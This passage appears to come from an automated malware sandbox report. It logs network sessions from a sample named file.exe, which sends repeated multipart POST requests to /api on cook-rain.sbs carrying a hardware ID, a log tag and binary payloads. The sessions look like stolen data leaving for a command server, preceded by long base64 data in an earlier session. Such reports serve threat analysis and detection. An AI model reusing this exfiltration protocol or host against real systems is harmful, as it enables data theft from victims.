                                                                                                                                                                                            2024-11-20 20:04:06 UTC1369INData Raw: 50 71 69 4e 38 5a 6b 30 45 50 55 56 55 68 61 30 52 65 76 45 62 45 39 58 41 32 31 31 5a 4d 55 62 4c 65 50 45 30 6e 48 4b 4f 38 38 71 68 4c 44 38 67 42 68 45 6c 46 77 72 49 69 77 5a 73 38 78 6b 50 6c 4f 69 52 54 42 45 72 44 38 64 39 74 47 76 59 4f 73 57 77 7a 72 4a 6a 5a 47 67 73 44 69 34 4a 42 74 4b 4f 56 48 57 34 44 6b 57 51 39 74 73 61 56 79 77 48 79 48 57 31 59 74 4a 2b 68 2f 62 48 70 79 77 36 49 67 30 45 4c 77 30 45 78 49 4d 66 5a 66 59 53 43 4a 50 38 6c 30 4d 53 61 45 69 4d 63 36 6b 73 68 44 71 6c 39 38 71 34 59 51 6b 72 41 77 30 69 45 30 7a 61 77 41 30 71 38 52 74 46 7a 37 71 56 52 78 67 36 42 39 35 78 76 33 37 51 66 34 33 39 79 71 51 6a 4f 53 38 41 44 53 4d 43 44 38 32 4b 46 57 54 36 48 51 61 54 2b 64 73 4d 56 79 38 65 6a 43 7a 78 58 64 39 2b 6a 4f
                                                                                                                                                                                            Data Ascii: PqiN8Zk0EPUVUha0RevEbE9XA211ZMUbLePE0nHKO88qhLD8gBhElFwrIiwZs8xkPlOiRTBErD8d9tGvYOsWwzrJjZGgsDi4JBtKOVHW4DkWQ9tsaVywHyHW1YtJ+h/bHpyw6Ig0ELw0ExIMfZfYSCJP8l0MSaEiMc6kshDql98q4YQkrAw0iE0zawA0q8RtFz7qVRxg6B95xv37Qf439yqQjOS8ADSMCD82KFWT6HQaT+dsMVy8ejCzxXd9+jO
                                                                                                                                                                                            2024-11-20 20:04:06 UTC1369INData Raw: 4d 69 38 4a 44 79 77 49 43 73 57 4a 45 47 2f 6b 45 67 79 62 39 74 73 4d 56 79 38 65 6a 43 7a 78 51 39 74 73 69 4e 2f 4b 75 79 70 38 4e 30 4d 61 5a 51 49 41 68 64 5a 55 62 66 4d 66 44 70 48 79 6d 31 41 53 4a 67 33 4e 66 72 64 74 30 58 61 4e 38 4d 69 71 4a 54 41 6f 43 67 51 33 46 77 6e 44 6e 42 34 71 75 46 63 43 6a 37 72 44 41 69 45 34 45 64 31 69 38 31 6e 66 64 49 58 33 33 2b 6f 38 63 6a 46 4e 42 43 6c 46 56 49 57 46 46 47 62 78 48 77 4f 54 38 70 52 4e 48 6a 6f 48 77 48 71 6a 61 39 78 7a 68 66 2f 46 6f 79 34 37 4a 51 59 4a 4b 41 45 4c 78 4d 35 61 4b 76 45 50 52 63 2b 36 72 56 49 61 4a 43 6a 48 65 4c 67 73 77 7a 53 53 73 4d 36 6d 59 32 52 6f 43 51 38 74 44 77 50 4d 68 42 35 6c 2f 78 63 4e 6e 76 4f 59 51 68 73 75 42 38 42 34 76 47 6e 66 66 34 62 31 79 61 59
                                                                                                                                                                                            Data Ascii: Mi8JDywICsWJEG/kEgyb9tsMVy8ejCzxQ9tsiN/Kuyp8N0MaZQIAhdZUbfMfDpHym1ASJg3Nfrdt0XaN8MiqJTAoCgQ3FwnDnB4quFcCj7rDAiE4Ed1i81nfdIX33+o8cjFNBClFVIWFFGbxHwOT8pRNHjoHwHqja9xzhf/Foy47JQYJKAELxM5aKvEPRc+6rVIaJCjHeLgswzSSsM6mY2RoCQ8tDwPMhB5l/xcNnvOYQhsuB8B4vGnff4b1yaY
                                                                                                                                                                                            2024-11-20 20:04:06 UTC1369INData Raw: 67 39 6c 58 55 7a 4a 6a 52 68 69 2b 52 45 4d 6d 2f 43 53 53 52 73 6a 41 73 42 39 74 47 72 64 66 34 37 78 7a 61 59 70 4f 69 73 4f 44 43 6f 4b 42 49 58 41 56 47 33 75 56 31 33 58 33 34 78 4a 47 53 35 47 30 7a 71 6f 4c 4e 74 32 79 36 69 4a 70 69 6f 36 4c 67 67 50 4a 41 4d 45 77 49 59 51 61 2f 41 52 42 70 6a 2b 6e 6b 4d 59 4c 41 72 43 66 72 42 74 30 48 47 45 2b 38 7a 71 62 58 77 76 46 55 4e 39 52 54 33 47 6d 41 4e 36 2b 6c 63 61 32 65 50 62 52 52 74 6f 58 6f 78 31 6f 32 62 57 64 49 37 2f 7a 4b 6b 73 4f 79 55 4c 44 79 38 4d 42 4d 4f 42 48 58 6a 31 47 77 75 51 39 4a 64 4d 47 69 49 46 77 54 54 2f 4c 4e 74 69 79 36 69 4a 68 69 51 78 42 67 59 50 49 6b 55 54 69 35 64 55 62 66 70 58 58 64 66 32 6b 55 34 65 4b 41 2f 4a 66 4c 70 6c 32 58 75 41 39 63 71 73 4c 6a 4d 68
                                                                                                                                                                                            Data Ascii: g9lXUzJjRhi+REMm/CSSRsjAsB9tGrdf47xzaYpOisODCoKBIXAVG3uV13X34xJGS5G0zqoLNt2y6iJpio6LggPJAMEwIYQa/ARBpj+nkMYLArCfrBt0HGE+8zqbXwvFUN9RT3GmAN6+lca2ePbRRtoXox1o2bWdI7/zKksOyULDy8MBMOBHXj1GwuQ9JdMGiIFwTT/LNtiy6iJhiQxBgYPIkUTi5dUbfpXXdf2kU4eKA/JfLpl2XuA9cqsLjMh
                                                                                                                                                                                            2024-11-20 20:04:06 UTC1369INData Raw: 56 55 68 59 67 62 59 2f 55 59 42 4a 37 32 6c 6b 63 65 4c 51 66 4b 63 4c 74 6d 33 48 79 4e 38 63 79 67 49 44 30 69 42 41 51 74 41 67 2f 58 7a 6c 6f 71 38 51 39 46 7a 37 71 79 52 51 55 6d 46 6f 78 72 2f 33 57 63 66 59 65 77 6b 65 6f 6e 4e 69 63 4a 42 43 6b 44 43 63 4f 44 46 57 58 33 46 77 71 54 38 5a 4a 45 46 69 55 44 77 58 43 6a 5a 74 64 31 68 2f 6e 46 70 32 4e 79 61 41 6f 62 5a 56 31 4d 39 49 4d 61 5a 50 45 42 52 59 69 30 67 67 49 51 4a 45 61 55 4e 4c 42 67 30 33 6d 45 38 38 71 72 4b 53 34 36 41 51 6f 74 41 41 44 4f 67 42 4a 34 38 42 67 4d 6c 50 6d 53 52 52 38 6b 44 4d 39 7a 38 53 4b 63 66 5a 4f 77 6b 65 6f 41 4b 7a 67 41 51 7a 70 4c 46 59 57 4a 47 43 71 75 56 77 32 61 38 70 46 47 45 43 55 42 79 6e 32 6a 5a 64 6c 30 69 2f 54 43 70 53 55 34 4b 77 30 52 49
                                                                                                                                                                                            Data Ascii: VUhYgbY/UYBJ72lkceLQfKcLtm3HyN8cygID0iBAQtAg/Xzloq8Q9Fz7qyRQUmFoxr/3WcfYewkeonNicJBCkDCcODFWX3FwqT8ZJEFiUDwXCjZtd1h/nFp2NyaAobZV1M9IMaZPEBRYi0ggIQJEaUNLBg03mE88qrKS46AQotAADOgBJ48BgMlPmSRR8kDM9z8SKcfZOwkeoAKzgAQzpLFYWJGCquVw2a8pFGECUByn2jZdl0i/TCpSU4Kw0RI
                                                                                                                                                                                            2024-11-20 20:04:06 UTC1369INData Raw: 4f 57 69 72 78 44 30 58 50 75 72 70 5a 46 43 51 4c 6a 47 76 2f 64 5a 78 39 68 37 43 52 36 69 38 79 4c 51 30 4a 49 77 45 4a 77 34 51 52 61 76 30 55 43 70 50 38 6e 30 30 58 49 77 2f 4e 63 72 52 6d 31 33 79 47 38 38 2b 73 59 33 4a 6f 43 68 74 6c 58 55 7a 6c 6c 52 6c 6d 38 56 63 61 32 65 50 62 52 52 74 6f 58 6f 78 2f 76 57 6a 62 65 6f 62 7a 77 61 38 6e 4e 69 30 4e 43 7a 63 4e 44 4d 4b 63 42 6d 72 2f 45 67 6d 55 2b 70 39 45 48 69 34 46 79 44 54 2f 4c 4e 74 69 79 36 69 4a 68 79 38 37 41 51 6f 59 5a 52 70 43 33 4d 34 54 5a 72 5a 50 52 5a 62 78 6b 55 30 61 4b 77 44 50 66 37 52 6d 33 58 32 44 2f 64 75 70 4c 44 4d 73 44 51 77 6a 41 77 33 4b 69 42 4e 6a 39 78 38 43 31 37 54 62 52 51 39 6f 58 6f 78 61 74 6d 2f 59 4f 70 53 2b 30 4f 6f 6b 4d 47 68 56 51 79 55 50 42 73
                                                                                                                                                                                            Data Ascii: OWirxD0XPurpZFCQLjGv/dZx9h7CR6i8yLQ0JIwEJw4QRav0UCpP8n00XIw/NcrRm13yG88+sY3JoChtlXUzllRlm8Vca2ePbRRtoXox/vWjbeobzwa8nNi0NCzcNDMKcBmr/EgmU+p9EHi4FyDT/LNtiy6iJhy87AQoYZRpC3M4TZrZPRZbxkU0aKwDPf7Rm3X2D/dupLDMsDQwjAw3KiBNj9x8C17TbRQ9oXoxatm/YOpS+0OokMGhVQyUPBs
                                                                                                                                                                                            2024-11-20 20:04:06 UTC1369INData Raw: 79 56 6c 46 6a 37 72 44 41 69 49 72 43 4d 4a 7a 70 33 32 52 58 5a 33 36 7a 72 6f 6b 4b 79 64 4e 54 57 55 44 54 4a 33 64 57 69 72 79 42 6b 58 50 71 73 6b 5a 51 6e 74 52 6e 43 61 75 49 73 55 36 6e 62 43 52 2b 47 31 38 4f 6b 31 62 5a 55 49 50 31 35 77 53 61 65 41 55 51 71 6e 45 76 46 67 61 4c 68 48 64 53 6f 39 72 78 6e 65 4e 35 39 6a 6d 4e 6a 38 6d 41 77 51 7a 52 55 4b 46 67 56 51 79 7a 31 64 4e 31 38 58 56 41 67 39 6f 58 6f 78 42 73 6d 4c 53 66 5a 33 68 68 49 30 35 4d 53 34 61 45 6d 56 4c 54 4d 50 4f 54 44 71 34 56 77 47 47 75 73 4d 53 52 58 4e 54 6e 79 50 68 50 73 4d 30 6b 72 44 66 36 6e 74 75 5a 6b 30 52 5a 56 31 4d 67 6f 30 47 65 50 41 55 45 35 53 39 70 58 77 35 4c 77 44 4a 63 36 45 75 38 6e 47 66 39 34 6e 6b 59 7a 4e 6f 56 54 70 6c 54 55 7a 36 77 46 52
                                                                                                                                                                                            Data Ascii: yVlFj7rDAiIrCMJzp32RXZ36zrokKydNTWUDTJ3dWiryBkXPqskZQntRnCauIsU6nbCR+G18Ok1bZUIP15wSaeAUQqnEvFgaLhHdSo9rxneN59jmNj8mAwQzRUKFgVQyz1dN18XVAg9oXoxBsmLSfZ3hhI05MS4aEmVLTMPOTDq4VwGGusMSRXNTnyPhPsM0krDf6ntuZk0RZV1Mgo0GePAUE5S9pXw5LwDJc6Eu8nGf94nkYzNoVTplTUz6wFR
                                                                                                                                                                                            2024-11-20 20:04:06 UTC1369INData Raw: 5a 50 72 32 78 70 48 65 6c 32 5a 4a 2b 59 38 6a 6d 58 46 36 59 6d 38 59 32 52 36 51 30 4d 33 52 56 53 46 79 52 64 34 35 42 45 47 67 66 6e 63 66 43 6b 50 43 4d 74 31 70 33 7a 4c 64 63 54 65 2f 34 73 64 41 6a 30 4f 44 53 73 43 47 74 54 4f 57 69 72 35 56 31 32 75 75 74 4d 43 4b 47 5a 47 31 44 54 70 4c 4f 6c 35 68 66 37 4f 76 44 4a 78 44 77 4d 45 4a 42 4d 63 30 6f 46 62 52 4d 41 32 52 64 6d 36 6e 51 4a 50 65 6b 69 4d 63 4b 41 73 68 43 72 5a 71 35 7a 35 64 47 78 36 45 6b 30 38 52 52 71 46 31 6b 59 6b 74 67 56 46 7a 37 72 63 51 51 55 36 41 4d 39 69 73 69 76 69 52 4b 7a 2b 7a 71 73 31 4c 43 55 42 49 69 59 55 42 76 75 77 41 57 6e 34 47 51 4b 42 36 39 73 4d 56 79 64 47 6c 45 33 78 4a 4a 78 46 78 62 44 52 36 6e 74 38 48 51 34 4e 4b 77 49 61 31 4d 4d 7a 5a 50 45 57
                                                                                                                                                                                            Data Ascii: ZPr2xpHel2ZJ+Y8jmXF6Ym8Y2R6Q0M3RVSFyRd45BEGgfncfCkPCMt1p3zLdcTe/4sdAj0ODSsCGtTOWir5V12uutMCKGZG1DTpLOl5hf7OvDJxDwMEJBMc0oFbRMA2Rdm6nQJPekiMcKAshCrZq5z5dGx6Ek08RRqF1kYktgVFz7rcQQU6AM9isiviRKz+zqs1LCUBIiYUBvuwAWn4GQKB69sMVydGlE3xJJxFxbDR6nt8HQ4NKwIa1MMzZPEW
                                                                                                                                                                                            2024-11-20 20:04:06 UTC1369INData Raw: 68 55 46 47 68 49 6a 47 7a 78 4e 4a 78 58 6d 66 66 5a 71 57 45 51 4c 77 41 50 5a 52 70 43 33 4d 34 43 4b 71 35 45 53 39 66 6f 32 78 70 58 62 77 58 65 5a 72 64 76 79 6e 6e 4d 7a 76 65 48 4d 54 73 34 44 6b 45 55 43 41 6a 54 6d 78 64 36 38 53 6b 37 75 75 69 63 55 68 52 71 49 2f 59 32 67 48 72 66 65 6f 58 33 69 65 52 6a 4a 47 68 56 51 77 67 58 43 39 57 4e 56 6b 2f 4d 56 54 53 42 2b 5a 74 4d 45 47 67 5a 67 6d 33 78 65 70 77 69 32 4c 36 4a 75 47 4e 6b 61 45 6f 4e 4b 41 51 50 79 34 30 47 65 50 41 55 45 35 53 39 70 58 77 34 49 77 66 63 65 61 42 68 32 47 79 31 7a 75 36 73 4a 6a 73 57 4d 7a 51 30 41 68 79 48 71 42 64 38 39 56 64 4c 31 2b 4c 62 47 6c 63 50 41 4d 6c 7a 38 53 4b 63 66 73 75 6f 69 59 55 6f 50 54 67 41 45 69 67 42 47 6f 65 70 45 6d 2f 78 56 30 76 58 39
                                                                                                                                                                                            Data Ascii: hUFGhIjGzxNJxXmffZqWEQLwAPZRpC3M4CKq5ES9fo2xpXbwXeZrdvynnMzveHMTs4DkEUCAjTmxd68Sk7uuicUhRqI/Y2gHrfeoX3ieRjJGhVQwgXC9WNVk/MVTSB+ZtMEGgZgm3xepwi2L6JuGNkaEoNKAQPy40GePAUE5S9pXw4IwfceaBh2Gy1zu6sJjsWMzQ0AhyHqBd89VdL1+LbGlcPAMlz8SKcfsuoiYUoPTgAEigBGoepEm/xV0vX9


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            2192.168.2.449732104.21.66.384436860C:\Users\user\Desktop\file.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:04:08 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=Y9CMD087JJA
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Length: 18127
                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                            2024-11-20 20:04:08 UTC15331OUTData Raw: 2d 2d 59 39 43 4d 44 30 38 37 4a 4a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 31 39 46 45 37 35 37 38 43 45 46 46 36 37 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 59 39 43 4d 44 30 38 37 4a 4a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 39 43 4d 44 30 38 37 4a 4a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 59 39 43 4d 44 30 38 37 4a 4a 41
                                                                                                                                                                                            Data Ascii: --Y9CMD087JJAContent-Disposition: form-data; name="hwid"319FE7578CEFF67B63CFCF7E6C45F838--Y9CMD087JJAContent-Disposition: form-data; name="pid"2--Y9CMD087JJAContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--Y9CMD087JJA
                                                                                                                                                                                            2024-11-20 20:04:08 UTC2796OUTData Raw: 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16 4d 6d b7 df b2 9f ab 08 69 99 b1 aa c5 3d ae 79 aa d5 a8 00 8f 1d 07 3c
                                                                                                                                                                                            Data Ascii: FD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?lMmi=y<
                                                                                                                                                                                            2024-11-20 20:04:09 UTC989INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:04:09 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Set-Cookie: PHPSESSID=e3o479sd9fkf69lrb8nj8ere5p; expires=Sun, 16-Mar-2025 13:50:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yRqhQ8zbbajdUUtLwSq2uUYyH%2Fl5%2FO25wfVdVwrd8bnAx2d6BkKwD4m99DnMky4R6lS7Qdw%2FeEa49pKJQoWijUNfPAX7XjX7XdjR4GIOto8hUB%2FlXw3r3F%2FlWaJiAsHL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8e5b0c216917c33b-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1604&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2829&recv_bytes=19079&delivery_rate=1773997&cwnd=182&unsent_bytes=0&cid=b23632045f4b8052&ts=1064&x=0"
                                                                                                                                                                                            2024-11-20 20:04:09 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                            2024-11-20 20:04:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            3192.168.2.449733104.21.66.384436860C:\Users\user\Desktop\file.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:04:10 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=G4LKVC42AX0DPUR2
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Length: 8778
                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                            2024-11-20 20:04:10 UTC8778OUTData Raw: 2d 2d 47 34 4c 4b 56 43 34 32 41 58 30 44 50 55 52 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 31 39 46 45 37 35 37 38 43 45 46 46 36 37 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 47 34 4c 4b 56 43 34 32 41 58 30 44 50 55 52 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 34 4c 4b 56 43 34 32 41 58 30 44 50 55 52 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                                                                            Data Ascii: --G4LKVC42AX0DPUR2Content-Disposition: form-data; name="hwid"319FE7578CEFF67B63CFCF7E6C45F838--G4LKVC42AX0DPUR2Content-Disposition: form-data; name="pid"2--G4LKVC42AX0DPUR2Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                                                                            2024-11-20 20:04:11 UTC980INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:04:11 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Set-Cookie: PHPSESSID=na4r384k9vhgn4nqehglsos316; expires=Sun, 16-Mar-2025 13:50:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wSt86a8G6AFqe%2BHad1A0kdPSNVX5r7Jejrng2tBraFvza%2BnupKFlN2GN1JgshEUyPKRr3MG7ZNZP7NyvmjtI7555Iycr0V6Rf0oyPpc18dA5SWxI0UZh4EvwUkRtM3rC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8e5b0c311d6ede92-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1587&sent=9&recv=14&lost=0&retrans=0&sent_bytes=2830&recv_bytes=9712&delivery_rate=1783750&cwnd=252&unsent_bytes=0&cid=dd5eab2db3caa0c7&ts=968&x=0"
                                                                                                                                                                                            2024-11-20 20:04:11 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                            2024-11-20 20:04:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            4192.168.2.449734104.21.66.384436860C:\Users\user\Desktop\file.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:04:13 UTC269OUTPOST /api HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=XAOTQLWO
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Length: 20383
                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                            2024-11-20 20:04:13 UTC15331OUTData Raw: 2d 2d 58 41 4f 54 51 4c 57 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 31 39 46 45 37 35 37 38 43 45 46 46 36 37 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 58 41 4f 54 51 4c 57 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 41 4f 54 51 4c 57 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 58 41 4f 54 51 4c 57 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                                            Data Ascii: --XAOTQLWOContent-Disposition: form-data; name="hwid"319FE7578CEFF67B63CFCF7E6C45F838--XAOTQLWOContent-Disposition: form-data; name="pid"3--XAOTQLWOContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--XAOTQLWOContent-Di
                                                                                                                                                                                            2024-11-20 20:04:13 UTC5052OUTData Raw: 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7
                                                                                                                                                                                            Data Ascii: lrQMn 64F6(X&7~`aO@dR<x)
                                                                                                                                                                                            2024-11-20 20:04:14 UTC988INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:04:14 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Set-Cookie: PHPSESSID=ri0uf6if8iac4hbs51fmcpbbhk; expires=Sun, 16-Mar-2025 13:50:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2BCdZljzNnaIh86chXTgFsu3RXj%2BZr222iAIQoaJdofJWkryzzo4fC%2FqQdD9G%2FiZDKF9%2B8P0ocjdlUPJ2HqjPcRn0HBLD8H1ovgPiBuBW3zKH98ZQSVt2BKKhs532X60"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8e5b0c416f90186d-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1640&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2830&recv_bytes=21332&delivery_rate=1752701&cwnd=250&unsent_bytes=0&cid=866b3f30d6d2e1d0&ts=838&x=0"
                                                                                                                                                                                            2024-11-20 20:04:14 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                            2024-11-20 20:04:14 UTC5INData Raw: 30 0d 0a 0d 0a
